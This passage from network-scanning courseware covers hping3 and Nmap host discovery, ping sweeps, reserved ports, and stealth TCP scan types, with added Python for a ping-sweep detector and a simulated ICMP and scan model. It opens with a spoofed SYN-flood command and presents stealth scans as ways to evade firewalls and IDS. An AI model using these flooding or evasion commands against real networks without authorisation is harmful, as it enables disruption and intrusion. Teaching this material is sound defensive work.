Intercept all traffic containing HTTP signature   hping3 -9 HTTP -I eth0
SYN flooding a victim                             hping3 -S 192.168.1.1 -a 192.168.1.254
- Metasploit
Source: https://www.metasploit.com

Metasploit is an open-source project that provides the infrastructure, content, and tools to perform penetration tests and extensive security auditing. It provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It facilitates the tasks of attackers, exploit writers, and payload writers. A major advantage of the framework is the modular approach, i.e., allowing the combination of any exploit with any payload. It enables you to automate the process of discovery and exploitation and provides you with the necessary tools to perform the manual testing phase of a penetration test. You can use Metasploit Pro to scan for open ports and services, exploit vulnerabilities, pivot further into a network, collect evidence, and create a report of the test results.

Figure 3.10: Screenshot of Metasploit displaying various port scan modules
- NetScanTools Pro
Source: https://www.netscantools.com

NetScanTools Pro is an investigation tool that allows you to troubleshoot, monitor, discover, and detect devices on your network. Using this tool, you can easily gather information about the local LAN as well as Internet users, IP addresses, ports, and so on. Attackers can find vulnerabilities and exposed ports in the target system. It helps the attackers to list IPv4/IPv6 addresses, hostnames, domain names, email addresses, and URLs automatically or manually (using manual tools). NetScanTools Pro combines many network tools and utilities categorized by their functions, such as active, passive, DNS, and local computer.

Figure 3.11: Screenshot of NetScanTools Pro

Some additional scanning tools are listed below:
- Unicornscan (https://sourceforge.net)
- SolarWinds Port Scanner (https://www.solarwinds.com)
- PRTG Network Monitor (https://www.paessler.com)
- OmniPeek Network Protocol Analyzer (https://www.savvius.com)
Scanning Tools for Mobile

- IP Scanner
IP Scanner for iOS scans your local area network to determine the identity of all its active machines and Internet devices. It allows attackers to perform network scanning activities along with ping and port scans.
- Fing
Source: https://www.fing.io

Fing is a mobile app for Android and iOS that scans and provides complete network information, such as IP address, MAC address, device vendor, and ISP location. It allows attackers to discover all devices connected to a Wi-Fi network along with their IP and MAC address as well as the name of the vendor/device manufacturer. It also allows attackers to perform network pinging and traceroute activities through specific ports such as SSH, FTP, NetBIOS, etc.

Figure 3.13: Screenshot of Fing
- Network Scanner
Source: https://play.google.com

Network Scanner is an Android mobile application that allows attackers to identify the active host in the range of possible addresses in a network. It also displays IP addresses, MAC addresses, host names, and vendor details of all available devices in the network. This tool also allows attackers to port scan targets with specific port numbers.

Figure 3.14: Screenshot of Network Scanner
Module Flow

Host Discovery

Scanning is the process of gathering information about systems that are "alive" and responding on the network. Host discovery is considered as the primary task in the network scanning process. To perform a complete scan and identify open ports and services, it is necessary to check for live systems. Host discovery provides an accurate status of the systems in the network, which enables an attacker to avoid scanning every port on every system in a sea of IP addresses to identify whether the target host is up.
Host Discovery Techniques

Host discovery techniques can be adopted to discover the active/live hosts in the network. As an ethical hacker, you must be aware of the various types of host discovery techniques. Some host discovery techniques are listed below:

- ARP Ping Scan
- UDP Ping Scan
- ICMP Ping Scan
  - ICMP ECHO Ping
  - ICMP ECHO Ping Sweep
  - ICMP Timestamp Ping
  - ICMP Address Mask Ping
- TCP Ping Scan
  - TCP SYN Ping
  - TCP ACK Ping
- IP Protocol Scan
ARP Ping Scan and UDP Ping Scan

Note: -sn is the Nmap command to disable the port scan. Since Nmap uses ARP ping scan as the default ping scan, to disable it and perform other desired ping scans, you can use --disable-arp-ping.

Figure 3.15: ARP ping scan (the attacker sends an ARP request probe to the target)

Advantages:
- ARP ping scan is considered to be more efficient and accurate than other host discovery techniques
- ARP ping scan automatically handles ARP requests, retransmission, and timeout at its own discretion
- ARP ping scan is useful for system discovery, where you may need to scan large address spaces
- ARP ping scan can display the response time or latency of a device to an ARP packet

Figure 3.16: ARP scan in Zenmap

UDP Ping Scan

Figure 3.17: UDP ping scan to determine if the host is active

Figure 3.18: UDP ping scan to determine if the host is inactive

Advantages:
- UDP ping scans have the advantage of detecting systems behind firewalls with strict TCP filtering, leaving the UDP traffic forgotten.

Figure 3.19: UDP ping scan in Zenmap
ICMP ECHO Ping Scan

Attackers use the ICMP ping scan to send ICMP packets to the destination system to gather all necessary information about it. This is because ICMP does not include port abstraction, and it is different from port scanning. However, it is useful to determine what hosts in a network are running by pinging them all.

ICMP ECHO ping scan involves sending ICMP ECHO requests to a host. If the host is alive, it will return an ICMP ECHO reply. This scan is useful for locating active devices or determining if ICMP is passing through a firewall.

Figure 3.20: ICMP echo request and echo reply (source 10.10.10.16, destination 10.10.10.10)

UNIX/Linux and BSD-based machines use ICMP echo scanning; the TCP/IP stack implementations in these OSs respond to the ICMP echo requests to the broadcast addresses. This technique does not work on Windows-based networks, as their TCP/IP stack implementation does not reply to ICMP probes directed at the broadcast address. Nmap uses the -P option to ICMP scan the target. The user can also increase the number of pings sent in parallel and tweak the ping timeout value with the corresponding Nmap options.

In Zenmap, the -PE option is used to perform the ICMP ECHO ping scan. Active hosts are displayed as "Host is up," as shown in the screenshot.

Figure 3.21: ICMP Echo ping scan output
ICMP ECHO Ping Sweep

A ping sweep (also known as an ICMP sweep) is a basic network scanning technique that is adopted to determine the range of IP addresses that map to live hosts (computers). Although a single ping will tell the user whether a specified host computer exists on the network, a ping sweep consists of ICMP ECHO requests sent to multiple hosts. If a specified host is active, it will return an ICMP ECHO reply.

Ping sweeps are among the oldest and slowest methods used to scan a network. This utility is distributed across nearly all platforms, and it acts as a roll call for systems; a system that is active on the network answers the ping query that another system sends out.

ICMP echo scanning pings all the machines in the target network to discover live machines. Attackers send ICMP probes to the broadcast or network address, which relays to all the host addresses in the subnet. The live systems will send the ICMP echo reply message to the source of the ICMP echo probe.

Figure 3.22: ICMP ECHO Ping Sweep (source 10.10.10.16 sends echo requests to 10.10.10.9, 10.10.10.10 and 10.10.10.12 and receives echo replies)

To understand pings better, one should be able to understand the TCP/IP packet. When a system pings, it sends a single packet across the network to a specific IP address. This packet contains 64 bytes (56 data bytes and 8 bytes of protocol header information). The sender then waits or listens for a return packet from the target system. If the connections are good and the target computer is "alive," a good return packet is expected. However, this will not be the case if there is a disruption in communication. Pings also detail the time taken for a packet to make a complete trip, called the "round-trip time." They also help in resolving hostnames. In this case, if the packet bounces back when sent to the IP address, but not when sent to the name, then the system is unable to reconcile the name with the specific IP address.

Attackers calculate subnet masks using subnet mask calculators to identify the number of hosts that are present in the subnet. They subsequently use ping sweep to create an inventory of live systems in the subnet.
ICMP ECHO Ping Sweep Using Nmap

Source: https://nmap.org

Nmap helps an attacker to perform a ping sweep that determines live hosts from a range of IP addresses. In Zenmap, the -PE option with a list of IP addresses is used to perform an ICMP ECHO ping sweep.

Figure 3.23: Ping sweep output using Zenmap (nmap -sn -PE 10.10.10.5-15)
Ping Sweep Tools

Ping sweep tools ping an entire range of network IP addresses to identify the live systems. The following are ping sweep tools that enable one to determine live hosts on the target network by sending multiple ICMP ECHO requests to various hosts on the network at a time.

- Angry IP Scanner
Source: https://www.angryip.org

Angry IP scanner is an IP address and port scanner. It can scan IP addresses in any range as well as any of their ports. It pings each IP address to check if it is alive; then, optionally, it resolves its hostname, determines the MAC address, scans ports, and so on. The amount of data gathered about each host increases with plugins. Angry IP scanner has additional features, such as NetBIOS information (computer name, workgroup name, and currently logged in Windows user), favorite IP address ranges, web server detection, and customizable openers. The tool allows the user to save the scanning results to CSV, TXT, XML, or IP-Port list files. To increase the scanning speed, it uses a multithreaded approach: a separate scanning thread is created for each scanned IP address.

Figure 3.24: Screenshot of Angry IP Scanner showing live hosts

Figure 3.25: Screenshot of Angry IP Scanner showing complete details of live hosts

Some additional ping sweep tools that an attacker uses to determine live hosts on the target network are listed below:
- SolarWinds Engineer's Toolset (https://www.solarwinds.com)
- NetScanTools Pro (https://www.netscantools.com)
- Colasoft Ping Tool (https://www.colasoft.com)
- Visual Ping Tester (http://www.pingtester.net)
- OpUtils (https://www.manageengine.com)
Ping Sweep Countermeasures

Some countermeasures for avoiding ping sweep are as follows:

- Configure the firewall to detect and prevent ping sweep attempts instantaneously
- Use intrusion detection systems and intrusion prevention systems such as Snort (https://www.snort.org) to detect and prevent ping sweep attempts
- Carefully evaluate the type of ICMP traffic flowing through the enterprise networks
- Terminate the connection with any host that is performing more than 10 ICMP ECHO requests
- Use DMZ and allow only commands such as ICMP ECHO_REPLY, HOST UNREACHABLE, and TIME EXCEEDED in the DMZ zone
- Limit the ICMP traffic with Access Control Lists (ACLs) to your ISP's specific IP addresses
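The countermeasure above that terminates connections with hosts issuing more than 10 ICMP ECHO requests, as an added example that is not part of the EC-Council courseware: a Python detector that reads firewall log lines, counts ICMP echo requests (type 8) per source inside a sliding time window, and reports sources that exceed the threshold together with the destinations they probed. The log line format, the addresses, and the 60-second window are assumptions constructed for the example; a real deployment would parse its own firewall's format and feed the result to a block rule.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed (constructed) log format, one line per ICMP packet:
# <ISO timestamp> ICMP <src> -> <dst> type=<n> code=<n>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) ICMP (?P<src>[\d.]+) -> (?P<dst>[\d.]+) "
    r"type=(?P<type>\d+) code=(?P<code>\d+)$"
)
ICMP_ECHO_REQUEST = 8


def ip_sort_key(ip):
    """Sort dotted-quad addresses numerically rather than as strings."""
    return tuple(int(octet) for octet in ip.split("."))


def detect_ping_sweeps(log_text, threshold=10, window=timedelta(seconds=60)):
    """Return {source: (echo requests within the window, sorted distinct
    destinations)} for every source that sent more than `threshold` ICMP
    echo requests inside any `window`-long span. Echo replies and other ICMP
    types are ignored, so a host that merely answers many pings is not
    flagged. The default threshold of 10 matches the countermeasure above."""
    recent = defaultdict(deque)      # source -> request timestamps still in window
    targets = defaultdict(set)       # source -> destinations it probed
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or int(m["type"]) != ICMP_ECHO_REQUEST:
            continue
        ts, src = datetime.fromisoformat(m["ts"]), m["src"]
        q = recent[src]
        q.append(ts)
        while q and ts - q[0] > window:      # slide the window forward
            q.popleft()
        targets[src].add(m["dst"])
        if len(q) > threshold:
            alerts[src] = (len(q), sorted(targets[src], key=ip_sort_key))
    return alerts


# Constructed firewall log (not a real capture): one legitimate ping and its
# reply, then 10.10.10.16 sweeping 10.10.10.5 through 10.10.10.16 in 12 s.
SAMPLE_LOG = (
    "2020-06-07T10:00:00 ICMP 10.10.10.2 -> 10.10.10.10 type=8 code=0\n"
    "2020-06-07T10:00:00 ICMP 10.10.10.10 -> 10.10.10.2 type=0 code=0\n"
    + "".join(
        f"2020-06-07T10:00:{i:02d} ICMP 10.10.10.16 -> 10.10.10.{5 + i} type=8 code=0\n"
        for i in range(12)
    )
)

if __name__ == "__main__":
    for src, (count, dests) in detect_ping_sweeps(SAMPLE_LOG).items():
        print(f"{src}: {count} echo requests to {len(dests)} hosts "
              f"({dests[0]} .. {dests[-1]})")
```

Counting per source inside a window, rather than over the whole log, is what keeps a long-running monitoring host that pings one gateway every minute from tripping the rule; the sweep stands out because its requests are both dense in time and spread over many destinations.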
Other Host Discovery Techniques

ICMP Timestamp Ping Scan

The target host may or may not respond with the time value depending on its configuration by the administrator at the target's end. This timestamp pinging is generally used specifically for time synchronization. Such a ping method is effective in identifying whether the destination host machine is active, in the condition where the administrator blocks the traditional ICMP ECHO ping requests. In Zenmap, the -PP option is used to perform an ICMP timestamp ping scan.
Figure 3.26: ICMP timestamp ping in Zenmap (nmap -sn -PP 10.10.10.10)

ICMP Address Mask Ping Scan

Figure 3.27: ICMP address mask ping in Zenmap (nmap -sn -PM 10.10.10.10)
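The 64-byte echo request (8 header bytes plus 56 data bytes) discussed under ping sweeps, and the timestamp (-PP) and address mask (-PM) probes of this section, as an added example that is not code from the EC-Council courseware: Python that builds these ICMP messages with a correct RFC 1071 checksum, parses them, and checks that a reply matches its request by type, identifier and sequence number. Nothing is sent; the identifiers, sequence numbers, filler bytes and helper names are constructed for illustration.

```python
import struct

ICMP_ECHO_REPLY, ICMP_ECHO_REQUEST = 0, 8
ICMP_TIMESTAMP_REQUEST, ICMP_TIMESTAMP_REPLY = 13, 14
ICMP_ADDRESS_MASK_REQUEST, ICMP_ADDRESS_MASK_REPLY = 17, 18
EXPECTED_REPLY = {
    ICMP_ECHO_REQUEST: ICMP_ECHO_REPLY,
    ICMP_TIMESTAMP_REQUEST: ICMP_TIMESTAMP_REPLY,
    ICMP_ADDRESS_MASK_REQUEST: ICMP_ADDRESS_MASK_REPLY,
}


def internet_checksum(data):
    """RFC 1071 one's-complement sum of 16-bit words; an odd trailing byte is
    padded with zero. Over a message whose checksum field is already filled
    in, the result is 0, which is how a receiver verifies it."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(icmp_type, code, rest_of_header, payload=b""):
    """Assemble type | code | checksum | 4-byte rest of header | payload,
    computing the checksum over the whole message with the field zeroed."""
    if len(rest_of_header) != 4:
        raise ValueError("rest-of-header must be exactly 4 bytes")
    body = rest_of_header + payload
    checksum = internet_checksum(struct.pack("!BBH", icmp_type, code, 0) + body)
    return struct.pack("!BBH", icmp_type, code, checksum) + body


def build_echo_request(ident, seq, data_len=56):
    """The classic ping described above: 8 bytes of ICMP header plus 56 data
    bytes, 64 bytes in total. The filler pattern is arbitrary (constructed)."""
    payload = bytes(i & 0xFF for i in range(data_len))
    return build_icmp(ICMP_ECHO_REQUEST, 0, struct.pack("!HH", ident, seq), payload)


def build_timestamp_request(ident, seq, originate_ms):
    """Type 13 probe (Nmap -PP): originate/receive/transmit timestamps in
    milliseconds since midnight UTC; the responder fills in the last two."""
    stamps = struct.pack("!III", originate_ms, 0, 0)
    return build_icmp(ICMP_TIMESTAMP_REQUEST, 0, struct.pack("!HH", ident, seq), stamps)


def build_address_mask_request(ident, seq):
    """Type 17 probe (Nmap -PM): a zeroed 4-byte mask field for the responder."""
    return build_icmp(ICMP_ADDRESS_MASK_REQUEST, 0, struct.pack("!HH", ident, seq), bytes(4))


def parse_icmp(msg):
    """Split an ICMP message into its fields and verify its checksum."""
    if len(msg) < 8:
        raise ValueError("an ICMP message is at least 8 bytes long")
    icmp_type, code, _ = struct.unpack("!BBH", msg[:4])
    ident, seq = struct.unpack("!HH", msg[4:8])
    return {"type": icmp_type, "code": code, "id": ident, "seq": seq,
            "payload": msg[8:], "checksum_ok": internet_checksum(msg) == 0}


def reply_for(request):
    """Build the reply a live host returns: same id, sequence and payload,
    with the type changed and the checksum recomputed. (A real timestamp or
    mask reply also fills in its fields; that part is not simulated.) Used
    here to show what a scanner matches against, without sending anything."""
    req = parse_icmp(request)
    if req["type"] not in EXPECTED_REPLY or not req["checksum_ok"]:
        return None
    return build_icmp(EXPECTED_REPLY[req["type"]], 0, request[4:8], req["payload"])


def is_matching_reply(request, reply):
    """True when `reply` is the well-formed answer to `request`: right type,
    valid checksum, and the same identifier and sequence number."""
    req, rep = parse_icmp(request), parse_icmp(reply)
    return (rep["checksum_ok"] and rep["type"] == EXPECTED_REPLY.get(req["type"])
            and (rep["id"], rep["seq"]) == (req["id"], req["seq"]))


if __name__ == "__main__":
    ping = build_echo_request(ident=0x1234, seq=1)
    print(len(ping), "bytes; fields:", parse_icmp(ping))
    print("reply matches:", is_matching_reply(ping, reply_for(ping)))
```

Matching on identifier and sequence number is what lets a ping utility (or a sweep tool) pair each reply with its request when many are in flight; a reply whose checksum fails or whose id does not match is simply discarded, which is also why a host that answers timestamp or mask requests reveals itself even when echo is filtered.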
TCP SYN Ping Scan

TCP SYN ping is a host discovery technique for probing different ports to determine if the port is online and to check if it encounters any firewall rule sets. In this type of host discovery technique, an attacker uses the Nmap tool to initiate the three-way handshake by sending the empty TCP SYN flag to the target host. After receiving SYN, the target host acknowledges the receipt by sending an ACK flag. After reception of the ACK flag, the connection is terminated with an RST flag to the target host machine (since the attacker confirms that the target host is active and his/her objective of host discovery is accomplished). Port 80 is used as the default destination port. A range of ports can also be specified in this type of pinging format without inserting a space between -PS and the port number (e.g., -PS22-25,80,113,1050,35000), where the probe will be performed against each port parallelly. In Zenmap, the -PS option is used to perform a TCP SYN ping scan.

Figure 3.28: TCP SYN ping scan for host discovery

Advantages:
- As the machines can be scanned parallelly, the scan never gets the time-out error while waiting for the response.
- TCP SYN ping can be used to determine if the host is active without creating any connection. Hence, the logs are not recorded at the system or network level, enabling the attacker to leave no traces for detection.

Figure 3.29: TCP SYN ping scan in Zenmap
TCP ACK Ping Scan

TCP ACK ping is similar to TCP SYN ping, albeit with minor variations. TCP ACK ping also uses the default port 80. In the TCP ACK ping technique, the attackers send an empty TCP ACK packet to the target host directly. Since there is no prior connection between the attacker and the target,

Figure 3.30: TCP ACK ping scan for host discovery

Both the SYN and the ACK packet can be used to maximize the chances of bypassing the firewall. However, firewalls are mostly configured to block the SYN ping packets, as they are the most common pinging technique. In such cases, the ACK probe can be effectively used to bypass these firewall rule sets easily.

Figure 3.31: TCP ACK ping scan in Zenmap (nmap -sn -PA 10.10.10.10)

IP Protocol Ping Scan
Multiple IP packets for ICMP (protocol 1), IGMP (protocol 2), and IP-in-IP (protocol 4) are sent by default when no protocols are specified. For configuring the default protocols, change DEFAULT_PROTO_PROBE_PORT_SPEC in nmap.h during compile time. For specific protocols such as ICMP, IGMP, TCP (protocol 6), and UDP (protocol 17), the packets are to be sent with proper protocol headers, and for the remaining protocols, only the IP header data is to be sent.

Figure 3.32: IP protocol ping scan for host discovery

In a nutshell, attackers send different probe packets of different IP protocols to the target host; any response from any probe indicates that a host is online. In Zenmap, the -PO option is used to perform an IP protocol ping scan.

Figure 3.33: IP protocol ping scan in Zenmap
Module Flow: Network Scanning Concepts, Scanning Tools, Port and Service Discovery, OS Discovery (Banner Grabbing/OS Fingerprinting), Scanning Beyond IDS and Firewall

Port and Service Discovery
Name            Port/Protocol   Description
echo            7/udp
discard         9/tcp           sink null
discard         9/udp           sink null
systat          11/tcp          Users
daytime         13/tcp
daytime         13/udp
netstat         15/tcp
qotd            17/tcp          Quote
chargen         19/tcp          ttytst source
chargen         19/udp          ttytst source
ftp-data        20/tcp          ftp data transfer
ftp             21/tcp          ftp command
ssh             22/tcp          Secure Shell
telnet          23/tcp
smtp            25/tcp          Mail
time            37/tcp          Timeserver
time            37/udp          Timeserver
rlp             39/udp
nickname        43/tcp          whois
domain          53/tcp          domain name server
domain          53/udp          domain name server
audionews       114/tcp         Audio News Multicast
audionews       114/udp         Audio News Multicast
nntp            119/tcp         Usenet Network News Transfer
nntp            119/udp         Usenet Network News Transfer
ntp             123/tcp         Network Time Protocol
ntp             123/udp         Network Time Protocol
netbios-ns      137/tcp         NETBIOS Name Service
netbios-ns      137/udp         NETBIOS Name Service
netbios-dgm     138/tcp         NETBIOS Datagram Service
netbios-dgm     138/udp         NETBIOS Datagram Service
netbios-ssn     139/tcp         NETBIOS Session Service
netbios-ssn     139/udp         NETBIOS Session Service
imap            143/tcp         Internet Message Access Protocol
imap            143/udp         Internet Message Access Protocol
sql-net         150/tcp         SQL NET
sql-net         150/udp         SQL NET
sqlsrv          156/tcp         SQL Service
sqlsrv          156/udp         SQL Service
snmp            161/tcp
snmp            161/udp
snmp-trap       162/tcp
snmp-trap       162/udp
cmip-man        163/tcp         CMIP/TCP Manager
cmip-man        163/udp         CMIP/TCP Manager
cmip-agent      164/tcp         CMIP/TCP Agent
cmip-agent      164/udp         CMIP/TCP Agent
irc             194/tcp         Internet Relay Chat
irc             194/udp         Internet Relay Chat
at-rtmp         201/tcp         AppleTalk Routing Maintenance
at-rtmp         201/udp         AppleTalk Routing Maintenance
at-nbp          202/tcp         AppleTalk Name Binding
at-nbp          202/udp         AppleTalk Name Binding
at-3            203/tcp         AppleTalk
at-3            203/udp         AppleTalk
at-echo         204/tcp         AppleTalk Echo
at-echo         204/udp         AppleTalk Echo
at-5            205/tcp         AppleTalk
at-5            205/udp         AppleTalk
at-zis          206/tcp         AppleTalk Zone Information
at-zis          206/udp         AppleTalk Zone Information
at-7            207/tcp         AppleTalk
at-7            207/udp         AppleTalk
at-8            208/tcp         AppleTalk
at-8            208/udp         AppleTalk
ipx             213/tcp         Novell
ipx             213/udp         Novell
imap3           220/tcp         Interactive Mail Access Protocol v3
imap3           220/udp         Interactive Mail Access Protocol v3
aurp            387/tcp         AppleTalk Update-Based Routing
aurp            387/udp         AppleTalk Update-Based Routing
netware-ip      396/tcp         Novell Netware over IP
netware-ip      396/udp         Novell Netware over IP
rmt             411/tcp         Remote mt
rmt             411/udp         Remote mt
kerberos-ds     445/tcp         Microsoft DS
kerberos-ds     445/udp         Microsoft DS
isakmp          500/udp         ISAKMP/IKE
fcp             510/tcp         FirstClass Server
exec            512/tcp         BSD rexecd(8)
comsat/biff     512/udp         used by mail system to notify users
login           513/tcp         BSD rlogind(8)
who             513/udp         BSD rwhod(8)
shell           514/tcp         cmd, BSD rshd(8)
syslog          514/udp         BSD syslogd(8)
printer         515/tcp         spooler, BSD lpd(8)
printer         515/udp         spooler
talk            517/tcp         BSD talkd(8)
talk            517/udp         Talk
ntalk           518/tcp         New Talk (ntalk)
ntalk           518/udp         SunOS talkd(8)
netnews         532/tcp         Readnews
uucp            540/tcp         uucpd, BSD uucpd(8)
uucp            540/udp         uucpd, BSD uucpd(8)
login           543/tcp         Kerberos Login
login           543/udp         Kerberos Login
kshell          544/tcp         Kerberos Shell
kshell          544/udp         Kerberos Shell
ekshell                         Kerberos encrypted remote shell (krcmd)
pcserver                        ECD Integrated PC board srvr
mount           635/udp         NFS Mount Service
pcnfs           640/udp         PC-NFS DOS Authentication
bwnfs           650/udp         BW-NFS DOS Authentication
flexlm          744/tcp         Flexible License Manager
flexlm          744/udp         Flexible License Manager
kerberos-adm    749/tcp         Kerberos Administration
kerberos-adm    749/udp         Kerberos Administration
kerberos        750/tcp         kdc, Kerberos authentication (tcp)
kerberos        750/udp         Kerberos authentication
kerberos_master 751/udp         Kerberos authentication
kerberos_master 751/tcp         Kerberos authentication
krb_prop        754/tcp         Kerberos slave propagation
                999/udp         Applixware
socks           1080/tcp
socks           1080/udp
kpop            1109/tcp        Pop with Kerberos
ms-sql-s        1433/tcp        Microsoft SQL Server
ms-sql-s        1433/udp        Microsoft SQL Server
rkinit          2108/tcp        Kerberos remote kinit
kx              2111/tcp        X over Kerberos
kauth           2120/tcp        Remote kauth
afs             7000-7009/udp   Andrew File System

Table 3.2: Reserved ports
Port Scanning Techniques

Port scanning techniques are further categorized as described below. This categorization is based on the type of protocol used for communication in the network.

TCP Scanning:
• Open TCP Scanning Methods
  o TCP Connect/Full Open Scan
• Stealth TCP Scanning Methods
  o Half-open Scan
  o Inverse TCP Flag Scan
    - Xmas Scan
    - FIN Scan
    - NULL Scan
    - Maimon Scan
  o ACK Flag Probe Scan
    - TTL-Based Scan
    - Window Scan
• Third Party and Spoofed TCP Scanning Methods
  o IDLE/IP ID Header Scan

UDP Scanning:
• UDP Scanning

SCTP Scanning:
• SCTP INIT Scanning
• SCTP COOKIE/ECHO Scanning

SSDP and List Scanning:
• SSDP Scanning
• List Scanning

IPv6 Scanning:
• IPv6 Scanning
TCP Connect/Full Open Scan

Source: http://insecure.org

TCP Connect/Full Open Scan is one of the most reliable forms of TCP scanning. In TCP Connect scanning, the OS's TCP connect() system call tries to open a connection to every port of interest on the target machine. If the port is listening, the connect() call will result in a successful connection with the host on that particular port; otherwise, it will return an error message that the port is not reachable.

TCP Connect scan completes a three-way handshake. In a three-way handshake, the client sends a SYN packet, which the recipient acknowledges with a SYN+ACK packet. Then, the client acknowledges the SYN+ACK packet with an ACK packet to complete the connection. Once the handshake is completed, the scanner sends an RST packet to end the connection. It does not require superuser privileges.

Figure 3.34: Scan result when a port is open
Figure 3.35: Scan result when a port is closed

Making a separate connect() call for every targeted port in a linear manner would take a long time over a slow connection. The attacker can accelerate the scan using many sockets in parallel. Using non-blocking I/O allows the attacker to set a short time-out period and watch all the sockets simultaneously. In Zenmap, the -sT option is used to perform a TCP Connect/full open scan.

Figure 3.36: TCP Connect/Full Open scan using Zenmap

The drawback of this type of scan is that it is easily detectable and filterable. The logs in the target system will disclose the connection. Such scanning does not require superuser privileges.
Stealth Scan (Half-open Scan)

The stealth scan involves abruptly resetting the TCP connection between the client and the server before completion of the three-way handshake signals, hence making the connection half-open. A stealth scan sends a single frame to a TCP port without any TCP handshaking or additional packet transfers. This type of scan sends a single frame with the expectation of a single response. The half-open scan partially opens a connection but stops halfway through. The stealth scan is also called a "SYN scan," because it only sends the SYN packet. This prevents the service from notifying the incoming connection. TCP SYN or half-open scanning is a stealth method of port scanning.

The stealth scan also implements the three-way handshake methodology. In the last stage, it examines the packets entering the interface and terminates the connection before triggering a new initialization to identify remote ports. The stealth scan process is described below.
• The client sends a single SYN packet to the server on the appropriate port.
• If the port is open, the server subsequently responds with a SYN/ACK packet.
• If the server responds with an RST packet, then the remote port is in the "closed" state.
• The client sends the RST packet to close the initiation before a connection can be established.

Figure 3.37: Port is open

Attackers use stealth scanning techniques to bypass firewall rules and logging mechanisms, and they hide themselves as usual network traffic. In Zenmap, the -sS option is used to perform a stealth scan/TCP half-open scan.

Figure 3.39: TCP stealth/Half Open scan using Zenmap

Inverse TCP Flag Scan

Attackers send TCP probe packets with a TCP flag (FIN, URG, PSH) set or with no flags. When the port is open, the attacker does not get any response from the host, whereas when the port is closed, he or she receives the RST from the target host.

Figure 3.40: Inverse TCP flag scan when port is open
Figure 3.41: Inverse TCP flag scan when port is closed

Security mechanisms such as firewalls and IDS detect the SYN packets sent to the sensitive ports of the targeted hosts. Programs such as Synlogger and Courtney are available to log half-open scan attempts. At times, the probe packets enabled with TCP flags can pass through filters undetected, depending on the security mechanisms installed.

An inverted technique involves probing a target using a half-open SYN flag because the closed ports can only send the response back. According to RFC 793, an RST/ACK packet is sent for connection reset when the host closes a port. Attackers take advantage of this feature to send TCP probe packets to each port of the target host with various TCP flags set.

Common flag configurations used for a probe packet include:
• A FIN probe with the FIN TCP flag set
• An Xmas probe with the FIN, URG, and PUSH TCP flags set
• A NULL probe with no TCP flags set
• A SYN/ACK probe

All closed ports on the targeted host will send an RST/ACK response. Since OSs such as Windows completely ignore the RFC 793 standard, you cannot see the RST/ACK response when connected to a closed port on the target host. However, this technique is effective when used with UNIX-based OSs.

Advantages
• Avoids many IDS and logging systems; highly stealthy

Disadvantages
• Needs raw access to network sockets, thus requiring super-user privileges
• Mostly effective against hosts using a BSD-derived TCP/IP stack (not effective against Microsoft Windows hosts, in particular)

Note: Inverse flag scanning is known as FIN, URG, and PSH scanning based on the flag set in the probe packet. If there is no flag set, it is known as NULL scanning. If only the FIN flag is set, it is known as FIN scanning, and if all of FIN, URG, and PSH are set, it is known as Xmas scanning.
Xmas Scan

Xmas scan is a type of inverse TCP scanning technique with the FIN, URG, and PUSH flags set to send a TCP frame to a remote device. If the target has opened the port, then you will receive no response from the remote system. If the target has closed the port, then you will receive a remote system reply with an RST. You can use this port scanning technique to scan large networks and find which host is up and what services it is offering.

This technique describes all TCP flag sets. When all flags are set, some systems hang; hence, the flags are often set in the nonsense pattern URG-PSH-FIN. Attackers use the TCP Xmas scan to determine if ports are closed on the target machine via the RST packet. This scan only works when systems are compliant with the RFC 793-based TCP/IP implementation. It will not work against any current version of Microsoft Windows.

Figure 3.42: Xmas scan when the port is open

BSD Networking Code
This method relies on the BSD networking code. Thus, you can use this only for UNIX hosts; it does not support Windows NT. If the user scans any Microsoft system, it will show that all the ports on the host are open.

Transmitting Packets
You can initialize all the flags when transmitting the packet to a remote host. If the target system accepts the packet and does not send any response, it means that the port is open. If the target system sends an RST flag, then it implies that the port is closed.

Advantages
• It avoids IDS and the TCP three-way handshake.

Disadvantages
• It works on the UNIX platform only.

In Zenmap, the -sX option is used to perform the Xmas scan, whereas the -sF and -sN options are used to perform the FIN scan and NULL scan, respectively.

Figure 3.44: Xmas scan output using Zenmap
TCP Maimon Scan

This scan technique is very similar to the NULL, FIN, and Xmas scans, but the probe used here is FIN/ACK. In most cases, to determine if the port is open or closed, the RST packet should be generated as a response to a probe request. However, in many BSD systems, the port is open if the packet gets dropped in response to a probe.

Nmap interprets a port as open|filtered when there is no response from the Maimon scan probe even after many retransmissions. The port is closed if the probe gets a response as an RST packet. The port is filtered when the ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13) is returned from the target host. In Zenmap, the -sM option is used to perform the TCP Maimon scan.

Figure 3.45: TCP Maimon scan result of open port
Figure 3.46: TCP Maimon scan result of closed port
Figure: TCP Maimon scan result of filtered port (FIN/ACK probe answered with an ICMP unreachable error)
Figure 3.48: TCP Maimon scan displaying port state in Zenmap

Module 03 Page 296
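The reply semantics described for the SYN, ACK, NULL, FIN, Xmas and Maimon probes, and the port state a scanner infers from each reply, as an added example that is not part of the EC-Council courseware. It models two simulated stacks: an RFC 793-compliant (BSD-derived) one, and a Windows-like one that is assumed here to answer every inverse-flag probe with RST regardless of port state, which is why the text says these scans tell you nothing about Windows hosts. No packets are sent; the stacks, ports and replies are all simulated.

```python
"""Added example (not from the EC-Council courseware): probe/reply model for the
TCP scan types described above and the port state a scanner infers from the reply.
Nothing here touches the network; targets and stacks are simulated."""
from typing import FrozenSet, Optional

# Probe definitions from the text, as frozen sets of TCP flag names.
PROBES = {
    "SYN": frozenset({"SYN"}),
    "ACK": frozenset({"ACK"}),
    "NULL": frozenset(),
    "FIN": frozenset({"FIN"}),
    "Xmas": frozenset({"FIN", "URG", "PSH"}),
    "Maimon": frozenset({"FIN", "ACK"}),
}
INVERSE_PROBES = {"NULL", "FIN", "Xmas", "Maimon"}


def classify_probe(flags: FrozenSet[str]) -> Optional[str]:
    """Name the probe type for a TCP flag set, or None if it is not one of PROBES."""
    for name, probe_flags in PROBES.items():
        if probe_flags == flags:
            return name
    return None


def target_reply(probe: str, port_state: str, stack: str) -> Optional[str]:
    """Reply a simulated target sends to a probe.

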